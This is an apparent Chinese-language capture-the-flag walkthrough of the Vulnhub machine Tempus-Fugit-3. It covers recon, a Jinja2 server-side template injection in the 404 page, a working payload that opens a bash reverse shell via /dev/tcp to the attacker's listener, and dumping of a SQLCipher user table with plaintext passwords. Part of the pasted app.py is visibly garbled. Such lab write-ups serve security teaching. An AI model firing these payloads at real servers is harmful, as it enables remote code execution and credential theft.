标签：Tempus app Fugit 192.168 Vulnhub kali 56.209 data

Tempus-Fugit-3

识别目标主机IP地址

(kali㉿kali)-[~/Desktop/Vulnhub/Tempus]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished!   |   Screen View: Unique Hosts                                                              
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:0b:ee:12      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.209  08:00:27:02:c5:6f      1      60  PCS Systemtechnik GmbH           

Kali Linux上利用netdiscover巩固识别目标主机IP地址为192.168.56.209

NMAP扫描

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Tempus]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.209 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-06 23:21 EST
Nmap scan report for localhost (192.168.56.209)
Host is up (0.00028s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
80/tcp open     http    nginx 1.14.2
|_http-title: Tempus Fugit
|_http-server-header: nginx/1.14.2
MAC Address: 08:00:27:02:C5:6F (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.39 seconds

NMAP扫描结果表明目标主机有1个开放端口：80（http)，22为filtered?是不是有端口knock?

获得Shell

浏览器访问80端口，内有Login链接。

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Tempus]
└─$ curl http://192.168.56.209/robots.txt                  
<html> 
<head> 
<style>

h1   {
  font-size:60px;
}
p    {
  color: red;
}
.float {
 background-color: transparent;
 width: 500;
 height: 200;
 position: fixed;
 color: ffffff;
 righ: 20%;
 bottom: 50;
}

html { 
  background: url(static/img/confused.jpg) no-repeat center center fixed; 
  -webkit-background-size: cover;
  -moz-background-size: cover;
  -o-background-size: cover;
  background-size: cover;
}

</style>
<title>Page Not Found</title> 
<script language="JavaScript" type="text/javascript"> 
  
var seconds =6; 
  
var url="/"; 
// variable for index.html url 
  
function redirect(){ 
 if (seconds <=0){ 
  
 // redirect to new url after counter  down. 
  window.location = url; 
 } else { 
  seconds--; 
  document.getElementById("pageInfo").innerHTML="Redirecting to Home Page after " 
+seconds+" seconds." 
  setTimeout("redirect()", 1000) 
 } 
} 
</script> 
</head> 
  

   
 <body onl oad="redirect()"> 
<p id="pageInfo"></p> 
<div class="float">
<h1>404</h1>
<h3>Hmmm...<br> Page not found: http://192.168.56.209/robots.txt</h3>  
</div>

  
</html> 

当输入任意不存在的url时:

192.168.56.209jlddouagugojgojgaojg

页面会返回：

Redirecting to Home Page after 2 seconds.
404

也就是说可能存在服务器侧模板渲染漏洞（类似于django的模板渲染）

用以下url进行验证:

http://192.168.56.209/{{2+2}

页面返回：

Redirecting to Home Page after 0 seconds.
404
Hmmm...
Page not found: http://192.168.56.209/4

返回结果证明了服务器存在模板渲染的情况。

接下来需要确认是哪种模板渲染的，如果是jinjia2，那么{{9*9}，会先做计算，否则就是其他的模板。

192.168.56.209/{{9*9}}

Hmmm...
Page not found: http://192.168.56.209/81

说明是jinjia2

看是否可以执行以下命令？

{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}

即访问以下url:

192.168.56.209/{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}

页面中有以下返回内容：

Hmmm...
Page not found: http://192.168.56.209/uid=33(www-data) gid=33(www-data) groups=33(www-data) 

说明命令得到了成功执行。

那么接下来就要设法得到反弹的shell

即：

{{''.__class__.__mro__[1].__subclasses__()[373]("bash -c 'bash -i >& /dev/tcp/192.168.56.146/5555 0>&1'",shell=True,stdout=-1).communicate()[0].strip()}}

访问以下url:

192.168.56.209/{{''.__class__.__mro__[1].__subclasses__()[373]("bash -c 'bash -i >& /dev/tcp/192.168.56.146/5555 0>&1'",shell=True,stdout=-1).communicate()[0].strip()}}

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Tempus]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.209] 47088
bash: /root/.bashrc: Permission denied
www-data@TF3:/srv/flask_app$ which python
which python
/usr/local/bin/python
www-data@TF3:/srv/flask_app$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
bash: /root/.bashrc: Permission denied
www-data@TF3:/srv/flask_app$ 

得到了目标主机反弹回来的shell

www-data@TF3:/tmp$ which wget
which wget
www-data@TF3:/tmp$ which curl
which curl

目标主机没有wget, curl

www-data@TF3:/srv/flask_app$ cat app.py
cat app.py
from flask import Flask, render_template
import flask, flask_login
from urllib.parse import unquote
from pysqlcipher3 import dbapi2 as sqlcipher


app = Flask(__name__)
app.secret_key = 'RmxhZzF7IEltcG9ydGFudCBmaW5kaW5ncyB9'

pra = "pragma key='SecretssecretsSecrets...'"

try:
  with app.open_resource('static/file/f') as f:
    contents = f.read().decode("utf-8")
except:
    codef validate(username, password):
    con = sqlcipher.connect("static/db2.db")
    con.execute(pra)
    completion = False
    with con:
                cur = con.cursor()
                cur.execute("SELECT * FROM Users")
                rows = cur.fetchall()
                for row in rows:
                    uname = row[0]
                    pw = row[1]
                    if uname==username:
                        completion=check_password(password, pw)
ntents = ""    

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Tempus]
└─$ echo 'RmxhZzF7IEltcG9ydGFudCBmaW5kaW5ncyB9' | base64 -d
Flag1{ Important findings }

www-data@TF3:/srv/flask_app/static$ sqlciphter db2.db --interactive
sqlciphter db2.db --interactive
bash: sqlciphter: command not found
www-data@TF3:/srv/flask_app/static$ sqlcipher db2.db --interactive
sqlcipher db2.db --interactive
SQLCipher version 3.15.2 2016-11-28 19:13:37
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
sqlite> pragma key='SecretssecretsSecrets...';
pragma key='SecretssecretsSecrets...';
sqlite> .tables;
.tables;
Error: unknown command or invalid arguments:  "tables;". Enter ".help" for help
sqlite> .tables
.tables
users
sqlite> select * from users;
select * from users;
hugh-janus|S0secretPassW0rd
anita-hanjaab|ssdf%dg5xc
clee-torres|asRtesa#2s
RmxhZzN7IEhleSwgcmVhZGluZyBzZWNyZXRzICB9|

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Tempus]
└─$ echo 'RmxhZzN7IEhleSwgcmVhZGluZyBzZWNyZXRzICB9' | base64 -d 
Flag3{ Hey, reading secrets  }  s

用上述得到用户名和密码登录/login页面

返回页面注释中为：

RmxhZzJ7IElzIHRoaXMgdGhlIGZvb3Rob2xkIEkgaGF2ZSBiZWVuIGxvb2tpbmcgZm9yP30

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Tempus]
└─$ echo 'RmxhZzJ7IElzIHRoaXMgdGhlIGZvb3Rob2xkIEkgaGF2ZSBiZWVuIGxvb2tpbmcgZm9yP30' | base64 -d
Flag2{ Is this the foothold I have been looking for?}base64: invalid input

标签：Tempus,app,Fugit,192.168,Vulnhub,kali,56.209,data
From： https://www.cnblogs.com/jason-huawen/p/17188672.html